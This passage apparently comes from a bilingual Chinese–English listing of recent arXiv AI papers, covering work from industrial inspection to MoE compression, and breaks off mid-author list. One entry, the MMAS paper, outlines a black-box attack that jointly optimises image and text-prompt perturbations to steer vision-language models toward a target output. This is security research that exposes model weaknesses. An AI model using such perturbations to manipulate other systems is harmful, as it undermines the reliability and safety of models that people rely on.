自动化工业检测需要精确的缺陷定位和结构化的维护报告生成;在当前的实践中,这些任务被分开处理,语言解释留给人类专家。本文描述了一种解耦的、边缘可部署的风电叶片检测管道,由三个组件组成,每个组件处理一个不同的子任务。“眼睛”是一个YOLO26-x-obb定向边界框检测器,在数据集原生分辨率下定位缺陷。“桥梁”是一个确定性的、无参数的编码模块,将每个检测到的边界框映射到嵌入结构化提示中的网格参考空间令牌。“大脑”是一个4比特量化的Qwen-2.5-1.5B模型,通过量化低秩适应(QLoRA)在947个合成生成的维护报告上进行适配,从该提示生成结构化的JSON报告。检索增强微调(RAFT)进一步将每个建议基于索引的维护程序。五项消融实验,通过BLEU-4、ROUGE-L、幻觉率(HR)和LLM-as-a-Judge评分标准,将该管道与单一视觉-语言模型(VLM)基线以及移除一个组件的部分配置进行比较。完整系统实现了BLEU-4 0.41、HR=4%和专家评分8.6/10,而零样本VLM基线分别为0.07、65%和3.3/10。在相同的检测证据下,QLoRA适配的1.5B模型在单个T4级GPU上以每秒47个令牌的速度生成比671B参数通用API模型更高质量的报告。结果表明,具有小型领域特定训练语料库的专用解耦架构在此结构化生成任务上优于通用端到端模型。

英文摘要

Automated industrial inspection requires both precise defect localization and structured maintenance report generation; in current practice these tasks are handled separately, with linguistic interpretation left to human experts. This paper describes a decoupled, edge-deployable pipeline for wind turbine blade inspection built from three components that each handle a distinct sub-task. The Eyes a YOLO26-x-obb oriented bounding-box detector localizes defects at dataset-native resolution. The Bridge a deterministic, parameter-free encoding module maps each detected bounding box to grid-referenced spatial tokens embedded in a structured prompt. The Brain a 4-bit quantized Qwen-2.5-1.5B model adapted with Quantized Low-Rank Adaptation (QLoRA) on 947 synthetically generated maintenance reports generates a structured JSON report from that prompt. Retrieval-Augmented Fine-Tuning (RAFT) further grounds each recommendation in indexed maintenance procedures. Five ablation experiments, scored by BLEU-4, ROUGE-L, Hallucination Rate (HR), and an LLM-as-a-Judge rubric, compare the pipeline against a monolithic vision-language model (VLM) baseline and against partial configurations in which one component is removed. The complete system achieves BLEU-4 0.41, HR=4%, and Expert Score = 8.6/10 compared with 0.07, 65%, and 3.3/10 for the zero-shot VLM baseline. The QLoRA-adapted 1.5B model generates higher-quality reports than a 671B-parameter generalist API model given identical detection evidence, at 47 tokens per second on a single T4-class GPU. The results show that purpose-built decoupled architecture with a small domain-specific training corpus outperforms a generalist end-to-end model on this structured generation task.

2605.26530 2026-05-27 cs.AI 版本更新

Which Changes Matter? Towards Trustworthy Legal AI via Relevance-Sensitive Evaluation and Solver-Grounded Reasoning

哪些变化重要?通过相关性敏感评估和求解器基础推理实现可信赖的法律AI

Chen Linze, Cai Yufan, Hou Zhe, Dong Jin Song

发表机构 * National University of Singapore(新加坡国立大学) Griffith University(格里菲斯大学)

AI总结 提出法律相关性敏感评估问题,引入统一评估套件,并设计基于形式推理的对抗多智能体框架LexGuard,以提高法律AI对法律相关变化的校准敏感性。

详情
AI中文摘要

法律推理需要区分重要的变化和不重要的变化。法律AI应在法律无关的扰动下保持稳定,但当扰动改变法律实质要点时应发生变化。我们将这一要求形式化为法律相关性敏感评估问题:LLM应仅对法律相关的变化敏感。我们引入了一个统一的评估套件,涵盖司法公平性、鲁棒性和法规混淆场景中的应变化和不应变化评估。我们的评估表明,现有的法律LLM系统性地对法律无关的变化敏感,并且常常无法区分相关的法律要素和法规规则。为了缓解这些失败,我们提出了LexGuard,一个基于形式推理的对抗多智能体框架。LexGuard将法规形式化为可执行约束,使用对抗智能体提取竞争的事实-法规论点,并调用SMT求解器验证法律满足性和逻辑一致性。实验表明,LexGuard通过减少对操纵性框架的脆弱性、改善相似法规之间的区分、限制法律无关属性的影响以及增加良性重述下的一致性,提高了法律推理的可靠性。我们表明,法律可信赖性不仅需要准确性,还需要对法律实质性变化的校准敏感性。

英文摘要

Legal reasoning requires distinguishing changes that matter from those that do not. Legal AI should remain stable under legally irrelevant perturbations, but should change when perturbations alter legally material points. We formulate this requirement as a legal-relevance-sensitive evaluation problem: LLMs should only be sensitive to the legally relevant change. We introduce a unified evaluation suite covering should-change and should-not-change evaluation across judicial fairness, robustness, and statute-confusion scenarios. Our evaluation shows that existing legal LLMs are systematically sensitive to legally irrelevant variations and often fail to distinguish related legal elements and statutory rules. To mitigate these failures, we present LexGuard, an adversarial multi-agent framework grounded in formal reasoning. LexGuard formalizes statutes into executable constraints, uses adversarial agents to extract competing fact-statute arguments, and invokes SMT solvers to verify legal satisfaction and logical consistency. Experiments show that LexGuard improves legal reasoning reliability by reducing vulnerability to manipulative framing, improving disambiguation among similar statutes, limiting the influence of legally irrelevant attributes, and increasing consistency under benign reformulations. We show that legal trustworthiness requires not only accuracy, but calibrated sensitivity to legally material changes.

2605.26525 2026-05-27 cs.CV cs.AI 版本更新

ReCA: Multi-Shot Long Video Extrapolation via Recursive Context Allocation

ReCA: 通过递归上下文分配实现多镜头长视频外推

Akide Liu, Jinbo Xing, Chaojie Mao, Ye Li, Zeyu Zhang, Yefei He, Weijie Wang, Zihan Wang, Yu Liu, Gholamreza Haffari, Bohan Zhuang

发表机构 * Monash University(墨尔本大学) Tongyi Lab, Alibaba Group(通义实验室,阿里集团) Zhejiang University(浙江大学) University of Queensland(昆士兰大学)

AI总结 针对多镜头视频外推任务中上下文分配瓶颈,提出递归上下文分配框架,通过层次化分解和结构化状态传播提升长视频生成的一致性和质量。

Comments Project Page: https://reca.vmv.re , Code: https://github.com/ali-vilab/ReCA

详情
AI中文摘要

分钟级电影式视频生成是生成式视频模型的核心挑战。现有范式仅解决该挑战的片段:单镜头外推保留锚点但缺乏电影结构,而多镜头叙事施加结构却可自由创造视觉状态而非延续观察到的状态。我们定义多镜头视频外推(MSVE)任务,该任务将观察到的帧或片段扩展为一系列具有电影结构的镜头,同时保留锚点状态并推进叙事意图。该设置受限于短视频模型的每次调用生成预算。我们识别出三个耦合瓶颈:(1)全局规划器从完整剧本中过度指定不支持的细节;(2)镜头级提示在携带完整故事时稀释任务相关状态;(3)时间链将生成帧转变为有损记忆,其中身份、场景、对象和动作状态衰减。MSVE揭示长视频失败不仅是上下文长度的限制,更是上下文分配失败。我们提出递归上下文分配(ReCA),一种推理时框架,在规划和生成之间分层分配上下文。ReCA递归地将MSVE分解为上下文有界子问题,在叶节点调用冻结生成器,并跨时间传播结构化状态更新。为评估该设置,我们进一步提出MSVE-Bench和NB-Q,一种源接地协议,带有专为3至5分钟长视频生成设计的提示,该场景未被现有短视频基准覆盖。与先前方法相比,ReCA在最强竞争控制器上将平均归一化分数提高8%至16%,并将多镜头一致性指标提高28%至43%。查看项目页面:https://reca.vmv.re。

英文摘要

Minute-scale cinematic video generation is a central challenge for generative video models. Existing paradigms address only fragments of this challenge: single-shot extrapolation preserves an anchor but lacks cinematic structure, while multi-shot storytelling imposes structure yet remains free to invent its visual states rather than continue an observed one. We define Multi-Shot Video Extrapolation (MSVE), a task that extends an observed frame or clip into a sequence of cinematically structured shots while preserving anchor state and advancing narrative intent. This setting operates under the finite per-call generation budget of short-video models. We identify three coupled bottlenecks: (1) global planners over-specify unsupported details from full screenplays; (2) shot-level prompts dilute task-relevant state when carrying the complete story; and (3) temporal chaining turns generated frames into a lossy memory in which identity, scene, object, and action state decay. MSVE reveals that long-video failure is not merely a limitation of context length, but a failure of context allocation. We propose Recursive Context Allocation (ReCA), an inference-time framework that allocates context hierarchically across planning and generation. ReCA recursively decomposes MSVE into context-bounded subproblems, invokes frozen generators at leaf nodes, and propagates structured state updates across time. To evaluate this setting, we further propose MSVE-Bench and NB-Q, a source-grounded protocol with prompts purpose-built for 3 to 5 minute long-video generation, a regime not addressed by existing short-clip benchmarks. Compared to previous methods, ReCA improves average normalized score by 8 to 16 percent over the strongest competing controller and improves multi-shot consistency metrics by 28 to 43 percent. View the project page at https://reca.vmv.re.

2605.26524 2026-05-27 cs.CV cs.AI 版本更新

CmIVTP: Cross-modal Interaction-based Vessel Trajectory Prediction for Maritime Intelligence

CmIVTP:面向海事智能的基于跨模态交互的船舶轨迹预测

Yuxu Lu, Dong Yang, Xiaoyu Li, Mengwei Bao, Congcong Zhao

发表机构 * Department of Logistics and Maritime Studies, the Hong Kong Polytechnic University(物流及海运研究系,香港理工大学) Research Centre for ESG Advancement (RCESGA), the Hong Kong Polytechnic University(ESG进步研究中心(RCESGA),香港理工大学) School of Navigation, Wuhan University of Technology(航海学院,武汉理工大学)

AI总结 针对单一数据源局限导致船舶轨迹预测不准的问题,提出跨模态交互框架CmIVTP,融合AIS和CCTV数据,利用目标感知场景编码器和跨模态交互Transformer实现高精度预测。

详情
AI中文摘要

海事智能交通系统(MITS)对于确保繁忙水域的航行安全和效率至关重要。然而,由于单源数据的局限性,准确的船舶轨迹预测仍然具有挑战性。自动识别系统(AIS)数据对于小型船舶通常稀疏或不可用,而仅靠闭路电视(CCTV)数据无法完全捕捉动态船舶行为。为缓解这些挑战,我们提出了一种基于跨模态交互的船舶轨迹预测(称为CmIVTP)框架,以建模船舶动力学与环境约束之间的复杂交互。具体地,我们引入了一个目标感知场景编码器来提取场景语义特征,有效捕捉船舶-环境交互并提高轨迹预测精度。此外,我们提出了一个跨模态交互变换器,它集成了AIS衍生的运动特征、基于CCTV的环境特征和场景表示。它利用跨模态注意力机制同时捕捉模态内语义和模态间交互,确保动态一致且环境可行的预测。此外,我们通过将历史AIS轨迹聚类为代表性运动模式构建了船舶群体轨迹库,为候选轨迹生成提供了一种高效且可扩展的方法。另外,我们引入了海事多模态数据集增强版(名为Maritime-MmD$^+$),这是一个同步AIS数据和CCTV视频数据的大规模数据集,为多模态轨迹预测研究提供了有力支持。大量实验表明,CmIVTP在多模态驱动的船舶轨迹预测基准上取得了更好的性能。本工作的代码资源可在https://github.com/LouisYxLu/CmIVTP获取。

英文摘要

Maritime intelligent transportation systems (MITS) are essential for ensuring navigation safety and efficiency in busy waterways. However, accurate vessel trajectory prediction remains challenging due to the limitations of single-source data. Automatic identification system (AIS) data is often sparse or unavailable for small vessels, while closed-circuit television (CCTV) data alone cannot fully capture dynamic vessel behavior. To mitigate these challenges, we propose a cross-modal interaction-based vessel trajectory prediction (named CmIVTP) framework to model the intricate interactions between vessel dynamics and environmental constraints. Specifically, we introduce a target-aware scene encoder to extract scene semantic features, effectively capturing vessel-environment interactions and enhancing trajectory prediction accuracy. In addition, we propose a cross-modal interaction transformer, which integrates AIS-derived motion features, CCTV-based environmental features, and scene representations. It leverages cross-modal attention mechanisms to simultaneously capture intra-modal semantics and inter-modal interactions, ensuring dynamically consistent and environmentally feasible predictions. Furthermore, we construct a vessel group trajectory bank by clustering historical AIS trajectories into representative motion patterns, providing an efficient and scalable approach for candidate trajectory generation. Additionally, we introduce the maritime multimodal dataset plus (named Maritime-MmD$^+$), a large-scale dataset that synchronizes AIS data and CCTV video data, providing robust support for multimodal trajectory prediction research. Extensive experiments demonstrate that CmIVTP achieves better performance on multimodal-driven vessel trajectory prediction benchmarks. The code resources for this work can be available at https://github.com/LouisYxLu/CmIVTP.

2605.26523 2026-05-27 cs.DC cs.AI cs.LG 版本更新

StreamSplit: Continuous Audio Representation Learning via Uncertainty-Guided Adaptive Splitting

StreamSplit: 通过不确定性引导的自适应分割实现连续音频表示学习

Minh K. Quan, Pubudu N. Pathirana

发表机构 * School of Engineering, Deakin University(德肯大学工程学院)

AI总结 提出StreamSplit框架,通过分布式的混合损失和强化学习策略实现边缘设备上的流式对比学习,在降低延迟、带宽和能耗的同时保持高精度。

Comments Accepted at ACM MobiSys 2026

详情
AI中文摘要

大批量对比学习(CL)是现代表示学习的基础,但与边缘设备波动的资源约束根本不相容。这种冲突造成了一个困境:设备上的小批量会降低模型保真度,而将计算卸载到云端则会导致不可接受的延迟和带宽成本。现有解决方案通常采用静态模型压缩,无法适应边缘环境的运行时波动。为弥合这一差距,我们提出了StreamSplit,一种新颖的框架,使得流式对比学习在异构ARM客户端平台上变得实用。StreamSplit解决了环境音频的连续性与CLAP和COLA等模型的离散批量需求之间的冲突。我们引入:(1)一种基于分布的流式框架,将表示质量与本地批量大小解耦,使用易于处理的混合损失在稀疏更新的情况下保持保真度;(2)一种不确定性引导的自适应分割器,使用轻量级强化学习(RL)策略动态划分计算。独特的是,该策略将实时资源监控与嵌入歧义性相结合,以动态优化准确率-延迟权衡。我们在从资源受限的Raspberry Pi 4到高性能Apple M2的多种硬件上评估了StreamSplit。结果表明,与以服务器为中心的基线相比,StreamSplit将每样本延迟降低了高达4.7倍,带宽减少了77.1%,能耗减少了52.3%。关键的是,它保持了与服务器中心模型相差2.2%以内的准确率,证明了自适应分布式学习是现代边缘生态系统的一条可行路径。

英文摘要

Large-batch Contrastive Learning (CL), the foundation of modern representation learning, is fundamentally incompatible with the volatile resource constraints of edge devices. This conflict creates a dilemma: small on-device batches degrade model fidelity, while offloading to the cloud incurs unacceptable latency and bandwidth costs. Existing solutions often resort to static model compression, which fails to adapt to the runtime volatility of edge environments. To bridge this gap, we present StreamSplit, a novel framework that makes streaming CL practical across heterogeneous ARM client platforms. StreamSplit resolves the conflict between the continuous nature of ambient audio and the discrete batch requirements of models like CLAP and COLA. We introduce: (1) A distribution-based streaming framework that decouples representation quality from local batch size, using a tractable Hybrid Loss to maintain fidelity despite sparse updates; and (2) An Uncertainty-Guided Adaptive Splitter that uses a lightweight Reinforcement Learning (RL) policy to dynamically partition computation. Uniquely, this policy integrates real-time resource monitoring with embedding ambiguity to optimize the accuracy-latency trade-off on the fly. We evaluate StreamSplit on diverse hardware, from the resource-constrained Raspberry Pi 4 to the high-performance Apple M2. Results demonstrate that StreamSplit reduces per-sample latency by up to 4.7x and cuts bandwidth by 77.1% and energy by 52.3% compared to server-centric baselines. Crucially, it maintains accuracy within 2.2% of server-centric models, proving that adaptive, distributed learning is a viable path for the modern edge ecosystem.

2605.26520 2026-05-27 cs.CV cs.AI 版本更新

InterSketch: An Interleaved Reasoning Model with Self-correcting Visual Sketch and Stepwise Reward

InterSketch: 一种具有自校正视觉草图和逐步奖励的交错推理模型

Zhiwei Ning, Wenwen Tong, Xiangli Kong, Shengnan Ma, Ziyi Shang, Jingcheng Ni, Tao Hu, Yong Xien Chng, Jixuan Ying, Zehuan Wu, Hanming Deng, Jie Yang, Yuanjie Zheng, Wei Liu, Lewei Lu

发表机构 * Shanghai Jiao Tong University(上海交通大学) SenseTime Research(商汤研究院) Shandong Normal University(山东师范大学)

AI总结 针对视觉-语言模型在长程视觉推理中文本中心范式局限性的问题,提出InterSketch模型,通过自校正和逐步奖励机制增强交错视觉-文本思维链能力,在视觉推理基准上超越Gemini-3-Pro等专有模型。

详情
AI中文摘要

尽管视觉-语言模型(VLM)已展现出多轮视觉推理能力,但其推理轨迹仍相对浅层且以文本为中心,限制了其在复杂视觉挑战中的适用性。相比之下,人类思维通常涉及长程推理,并伴有交错的视觉-文本思维链(VT-CoT)。为弥合这一差距,我们引入InterSketch,一种交错推理模型,通过自校正和逐步奖励机制增强VT-CoT能力。InterSketch使用外部工具动态生成中间视觉草图,并将其与文本推理交错进行,从而在长程视觉理解任务中实现有效的感知和逻辑推理。具体而言,在第一个冷启动阶段,我们提出了一个合成的高质量交错VT-CoT数据集,并引入反思机制,使模型具备多轮交错推理和自校正能力。在后续的强化学习(RL)阶段,我们设计了一种逐步奖励机制,以缓解长程推理中仅端到端监督固有的奖励信号稀疏性问题。在视觉推理基准上的大量实验证明了InterSketch的有效性,其性能甚至超越了Gemini-3-Pro等专有模型。

英文摘要

While vision-language models (VLMs) have exhibited multi-turn visual reasoning capabilities, their reasoning trajectories remain relatively shallow and are dominated by a text-centric paradigm, limiting their applicability to complex visual challenges. In contrast, human-like thought typically involves long-horizon reasoning with an interleaved visual-textual chain-of-thought (VT-CoT). To bridge this gap, we introduce InterSketch, an interleaved reasoning model to enhance the VT-CoT capability via self-correcting and stepwise reward mechanisms. InterSketch dynamically generates intermediate visual sketches using external tools and interleaves them with textual reasoning, enabling effective perception and logical reasoning over long-horizon visual understanding tasks. Specifically, in the first cold-start stage, we propose a synthesized high-quality interleaved VT-CoT dataset and include a reflection mechanism to enable the model's capability in multi-turn interleaved reasoning and self-correction. In the subsequent reinforcement learning (RL) stage, we design a stepwise reward mechanism to mitigate the sparsity of reward signals inherent in end-only supervision over long-horizon reasoning. Extensive experiments on visual reasoning benchmarks demonstrate the effectiveness of InterSketch, even outperforming proprietary models such as Gemini-3-Pro.

2605.26514 2026-05-27 cs.CV cs.AI cs.LG 版本更新

CSV-ViT: A Vision Transformer with the Variable-sized Cortical Supervertices for Detection of Alzheimer's Disease Pathologies

CSV-ViT: 一种使用可变大小皮层超顶点的视觉Transformer用于阿尔茨海默病病理检测

Geonwoo Baek, Ikbeom Jang

发表机构 * Department of Computer Science and Engineering(计算机科学与工程系) Hankuk University of Foreign Studies(韩国家 foreign 学院)

AI总结 提出一种保留感兴趣区域的、基于顶点的可变大小皮层表面分块方法(皮层超顶点),并设计可变大小补丁兼容的视觉Transformer(CSV-ViT),在阿尔茨海默病诊断、淀粉样蛋白阳性和tau蛋白阳性三分类任务中优于现有表面模型。

详情
AI中文摘要

确认阿尔茨海默病(AD)通常依赖于正电子发射断层扫描(PET),该方法仍然昂贵且有创,这促使了基于结构MRI的预筛查的使用。在非欧几里得流形,特别是大脑皮层表面上的深度学习,由于数据的球形拓扑结构面临重大挑战。最近的表面模型已经能够从皮层表面数据中学习;然而,施加基于面的均匀补丁通常会导致补丁边界处的重复顶点。一般来说,许多基于表面的模型对感兴趣区域(ROI)的感知有限,这可能导致非皮层区域(如内侧壁)被包含在内。我们提出了一种皮层表面分块方法,该方法执行保留ROI的、基于顶点的、可变大小的补丁划分。我们将这些皮层表面补丁称为皮层超顶点(CSV)。基于这种表示,我们设计了CSV视觉Transformer(CSV-ViT),这是一种可变大小补丁容忍的视觉Transformer,使用填充和掩码感知的补丁嵌入。我们使用T1加权MRI,并通过将AD相关状态分类为三个类别来评估我们的框架:AD诊断、淀粉样蛋白阳性和tau蛋白阳性。在实验中,CSV-ViT取得了比最近基于表面的模型更高的分类性能。结果表明,所提出的CSV-ViT可能支持在PET或脑脊液确认之前基于MRI的AD相关状态预测。

英文摘要

Confirming Alzheimer's disease (AD) typically relies on positron emission tomography (PET), which remains costly and invasive, motivating the use of structural MRI-based prescreening. Deep learning on non-Euclidean manifolds, particularly brain cortical surfaces, faces significant challenges due to the data's spherical topology. Recent surface models have enabled learning from cortical surface data; however, imposing face-based uniform patches often causes duplicate vertices at patch boundaries. In general, many surface-based models are limited in their awareness of the region of interest (ROI), which can result in non-cortical regions, such as the medial wall, being included. We propose a cortical surface tokenization that performs ROI-preserving, vertex-based, variable-sized patch partitioning. We refer to these cortical surface patches as cortical supervertices (CSVs). Building on this representation, we design the CSV Vision Transformer (CSV-ViT), a variable-size patch-tolerant Vision Transformer that uses padding and a mask-aware patch embedding. We used T1-weighted MRI and evaluated our framework by classifying AD-related status into three categories: AD diagnosis, amyloid positivity, and tau positivity. Across the experiments, CSV-ViT achieved higher classification performance than recent surface-based models. The results suggest that the proposed CSV-ViT may support MRI-based prediction of AD-related status prior to PET or CSF confirmation.

2605.26508 2026-05-27 q-fin.RM cs.AI 版本更新

Foundations of a Time-Consistent Counterfactual Actuarial Runtime for Autonomous AI Agents

自主AI智能体时间一致性反事实精算运行时的基础

Hao-Hsuan Chen

发表机构 * Department of Risk Management and Insurance(风险管理与保险系)

AI总结 本文提出一种精算运行时层,通过为每个动作分配时间一致的反事实风险费用,并建立边界内无套利和预算保证,为自主AI智能体提供基础数学框架。

Comments 10 pages. Foundational paper of a multi-paper program on actuarial runtime for autonomous AI agents; previously posted on SSRN (id 6761960). Empirical companion: arXiv:2605.25632. Proof companions included as ancillary files

详情
AI中文摘要

我们为自主AI智能体提出一个基础的精算运行时层,其中每个带有副作用的动作都承担一个时间一致的反事实风险费用,该费用根据合同固定的安全默认值计算,并位于明确的承保边界内。该框架将每个动作的保险作为主要分析单元,并用动作前交易层取代事后年度责任保险。本文建立了四个结构性结果:(i) 在选定的安全默认映射和延续策略下,定义明确的反事实费用,具有显式的非唯一性;(ii) 承保边界内的无分割性质,将路径分解的动作映射为边界势能,并推论出博弈抵抗与边界设计的关系;(iii) 不可逆权威溢价,分为严格正的动作级部分和集合级稳健资本增加的充要特征;(iv) 保守运行时门控定理,将高概率费用包络转化为执行动作预算保证。该结果是更广泛项目的数学基础层:一个实证配套通过精算动作接口和权威前沿实验实例化运行时;一个机制设计配套研究战略操作者激励和跨边界聚合;一个动态承保配套研究经验评级和审计重放校准。本文陈述了原始合约、费用恒等式、边界内无套利结果以及后续层所依赖的预算保证。

英文摘要

We propose a foundational runtime actuarial layer for autonomous AI agents in which every side-effect-bearing action carries a time-consistent, counterfactual risk toll computed against a contractually fixed safe default, inside an explicit underwriting boundary. The framework treats per-action insurance as the primary unit of analysis and replaces post-hoc annual liability cover with a pre-action transaction layer. The paper establishes four structural results: (i) a well-defined counterfactual toll under a chosen safe-default mapping and continuation policy, with explicit non-uniqueness; (ii) a no-splitting property within an underwriting boundary that telescopes path-decomposed actions into a boundary potential, with a corollary tying gaming-resistance to boundary design; (iii) an irreversible-authority premium, split into a strictly positive action-level component and an if-and-only-if characterisation of the set-level robust capital increase; and (iv) a conservative runtime gating theorem that translates high-probability toll envelopes into an executed-action budget guarantee. The result is the mathematical base layer for a broader program: an empirical companion instantiates the runtime through an Actuarial Action Interface and authority-frontier experiments; a mechanism-design companion studies strategic operator incentives and cross-boundary aggregation; and a dynamic-underwriting companion studies experience rating and audit-replay calibration. The present paper states the primitive contract, the toll identity, the within-boundary no-arbitrage result, and the budget guarantee on which those later layers depend.

2605.26501 2026-05-27 cs.CV cs.AI 版本更新

Unveiling the Fragility of Vision-Language Models: Multi-Modal Adversarial Synergy via Texture-Constrained Perturbations and Cross-Modal Optimization

揭示视觉-语言模型的脆弱性:通过纹理约束扰动和跨模态优化的多模态对抗协同

Xiang Fang, Wanlong Fang, Changshuo Wang

发表机构 * School of Software Engineering, Huazhong University of Science and Technology(华中科技大学软件学院) Nanyang Technological University, Singapore(新加坡南洋理工大学) University College London(伦敦大学学院)

AI总结 提出多模态对抗协同框架,通过纹理约束的通用对抗扰动和可学习的文本提示扰动,在黑盒设置下联合优化,揭示视觉-语言模型在多模态攻击下的脆弱性。

Comments Publish in AAAI 2026

详情
AI中文摘要

大型视觉-语言模型(LVLMs)通过整合视觉和文本输入,在图像描述和视觉问答等任务中表现出色,改变了多模态理解。然而,它们对抗攻击的鲁棒性,特别是利用两种模态的攻击,仍未被充分探索,这给自动驾驶和内容审核等关键应用带来了风险。现有攻击集中于单一模态或需要不切实际的白盒访问,限制了其现实相关性。在本文中,我们引入了多模态对抗协同(MMAS),这是一个开创性的框架,用于针对LVLMs构建通用的黑盒多模态攻击。MMAS同时生成纹理尺度约束的通用对抗扰动用于图像,以及可学习的提示扰动用于文本,仅通过模型查询进行联合优化。图像扰动利用基于小波的纹理约束确保在各种视觉输入中的不可感知性和鲁棒性。文本扰动在嵌入空间中受L范数约束,在保持语义连贯性的同时将输出导向目标。一种新颖的跨模态正则化项对齐扰动的梯度方向,增强了它们在任务和模型间的协同影响和可迁移性。大量实验表明,我们提出的攻击在主流LVLMs上具有强大的通用对抗能力。

英文摘要

Large Vision-Language Models (LVLMs) have transformed multi-modal understanding, excelling in tasks like image captioning and visual question answering by integrating visual and textual inputs. However, their robustness against adversarial attacks, particularly those exploiting both modalities, remains underexplored, posing risks to critical applications like autonomous driving and content moderation. Existing attacks focus on single modalities or require impractical white-box access, limiting their real-world relevance. In this paper, we introduce Multi-Modal Adversarial Synergy, a groundbreaking framework that crafts universal, black-box multi-modal attacks against LVLMs. MMAS simultaneously generates a texture scale-constrained universal adversarial perturbation for images and a learnable prompt perturbation for text, optimized jointly using only model queries. The image perturbation leverages wavelet-based texture constraints to ensure imperceptibility and robustness across diverse visual inputs. The text perturbation, constrained by an L-norm in the embedding space, maintains semantic coherence while steering outputs toward a target. A novel cross-modal regularization term aligns the perturbations' gradient directions, enhancing their synergistic impact and transferability across tasks and models. Extensive experiments show the strong universal adversarial capabilities of our proposed attack with prevalent LVLMs.

2605.26496 2026-05-27 cs.LG cs.AI 版本更新

Dense2MoE: Pushing the Pareto Frontier of On-Device LLMs via Unified Pruning and Upcycling

Dense2MoE:通过统一剪枝和升级推动设备端LLM的帕累托前沿

Fengfa Li, Hongjin Ji, Yifeng Ding, Lei Ren, Chen Wei

发表机构 * Li Auto The Chinese University of Hong Kong, Shenzhen(香港中文大学(深圳))

AI总结 提出Dense2MoE框架,通过层融合升级(LF-UC)统一剪枝和升级,将密集LLM高效转换为设备端MoE模型,在推理延迟与准确性之间取得更优帕累托前沿。

Comments 19 pages

详情
AI中文摘要

混合专家(MoE)架构对于资源受限的设备端部署极具前景,但从头训练这些模型成本高昂。当前方法试图通过将密集模型升级为MoE来缓解这一问题,然而它们常常引入参数冗余,降低推理效率。另一方面,标准层剪枝减少了冗余,但不可避免地损害模型准确性。为解决这一困境,我们提出Dense2MoE,一种通过层融合升级(LF-UC)统一剪枝和升级的新框架。在硬件Roofline理论指导下,Dense2MoE通过剪枝来自冗余层的带宽密集型注意力模块,同时将其多层感知机(MLP)重新用作MoE专家,系统地克服了推理内存墙。这种结构创新保留了模型的核心能力,并通过选择性令牌路由严格限制活跃参数。借助适度的持续预训练预算,Dense2MoE高效地将公开可用的密集LLM转换为设备端就绪的MoE模型。大量实验表明,Dense2MoE显著推进了设备端推理延迟与模型准确性的帕累托前沿,优于密集基线、最先进的压缩方法和标准升级方法。

英文摘要

The Mixture of Experts MoE architecture is highly promising for resource constrained on device deployments yet training these models from scratch incurs prohibitive costs Current methods attempt to alleviate this by upcycling dense models into MoEs however they often introduce parameter redundancy that degrades inference efficiency Alternatively standard layer pruning mitigates redundancy but inevitably compromises model accuracy To resolve this dilemma we propose Dense2MoE a novel framework that unifies pruning and upcycling through Layer Fusion UpCycling LF UC Guided by hardware Roofline theory Dense2MoE systematically overcomes the inference memory wall by pruning bandwidth heavy attention modules from redundant layers while repurposing their Multi Layer Perceptrons MLPs into MoE experts This structural innovation preserves the models core capabilities and strictly limits active parameters via selective token routing With a modest continual pre training budget Dense2MoE efficiently converts publicly available dense LLMs into on device ready MoE models Extensive experiments demonstrate that Dense2MoE significantly advances the Pareto frontier for on device inference latency versus model accuracy outperforming dense baselines state of the art compression and standard upcycling methods

2605.26494 2026-05-27 cs.AI cs.CL cs.LG 版本更新

The MiniMax-M2 Series: Mini Activations Unleashing Max Real-World Intelligence

MiniMax-M2系列:小激活释放最大现实智能

MiniMax, :, Aili Chen, Aonian Li, Baichuan Zhou, Bangwei Gong, Binyang Jiang, Boji Dan, Changqing Yu, Chao Wang, Cheng Ma, Cheng Zhong, Cheng Zhu, Chengjun Xiao, Chengyi Yang, Chengyu Du, Chenyang Zhang, Chi Zhang, Chuangyi Huang, Chunhao Zhang, Chunhui Du, Chunyu Zhao, Congchao Guo, Da Chen, Deming Ding, Dianjun Sun, Dongyu Zhang, Enhui Yang, Fei Yu, Guang Zheng, Guodong Zheng, Guohong Li, Haichao Zhu, Haigang Zhou, Haimo Zhang, Han Ding, Hao Zhang, Haohai Sun, Haolin Lyu, Haonan Lu, Haoyu Wang, Huajie Shi, Huiyang Li, Jiacheng Chen, Jian Zhang, Jiaqi Zhuang, Jiaren Cai, Jiaxin Pan, Jiayao Li, Jiayuan Song, Jichuan Zhang, Jie Wang, Jihao Gu, Jin Zhu, Jingwei Dong, Jingyang Li, Jingyu Zhang, Jingze Zhuang, Jinhao Tian, Jinli Liu, Jinyi Hu, Jun Tao, Jun Zhang, Junbin Ruan, Junhao Xu, Junjie Yan, Junteng Liu, Junxian He, Kang Xu, Ke Ji, Ke Yang, Kecheng Xiao, Keyu Duan, Keyu Li, Le Han, Letian Ruan, Li Yuan, Lianfei Yu, Liheng Feng, Lijie Mo, Lin Li, Lingye Bao, Lingyu Yang, Lingyuan Zhou, Loki, Lu Chen, Lunbin Ceng, Ming Li, Ming Zhong, Mingliang Tao, Mingyuan Chi, Mujie Lin, Nan Hu, Ningxin Chen, Peiyin Zhu, Peng Gao, Pengcheng Gao, Pengfei Li, Penglin Li, Pengyu Zhao, Qibin Ren, Qidi Xu, Qihan Ren, Qile Li, Qin Wang, Quanliang Chen, Qunhong Ceng, Rong Tian, Rui Dong, Ruitao Leng, Ruize Zhang, Shanqi Liu, Shaoyu Chen, Sheng Jia, Shun Yao, Shuoran Zhao, Shuqi Yu, Sichen Li, Sicheng Pan, Songquan Zhu, Tengfei Li, Tian Xie, Tiancheng Qin, Tianrun Liang, Wei Liu, Weiqi Xu, Weitao Li, Weixiang Chen, Weiyu Cheng, Weiyu Zhang, Wenhu Chen, Wenqian Zhao, Xiancai Chen, Xiangjun Song, Xiangyuan Wang, Xiao Luo, Xiao Su, Xiaobo Li, Xiaodong Han, Xiaojie Wu, Xihao Song, Xingyi Han, Xinyu Guan, Xuan Lu, Xun Zou, Xunhao Lai, Xutong Li, Yan Gong, Yang Wang, Yang Xu, Yangsen Wang, Ye Tang, Yicheng Chen, Yinran Qiu, Yiqi Shi, Yiting Guo, Yiwen Huang, Yixuan Wang, Yongyi Hu, Yu Gao, Yu Zhang, Yuanxiang Ying, Yuanzhen Zhang, Yubo Wang, Yuchen Song, Yufeng Yang, Yuhang Meng, Yuhang Miao, Yuhao Li, Yujie Liu, Yulin Hu, Yunan Huang, Yunji Li, Yunyi Huang, Yusen Zhang, Yusu Hong, Yutao Xie, Yutong Zhang, Yuwen Liao, Yuxuan Shi, Yuze Wenren, Zebin Li, Zehan Li, Zejian Luo, Zeyu Jin, Zeyuan Sun, Zhanpeng Zhou, Zhaochen Su, Zhendong Li, Zhengmao Zhu, Zhengyuan Peng, Zhenhua Fan, 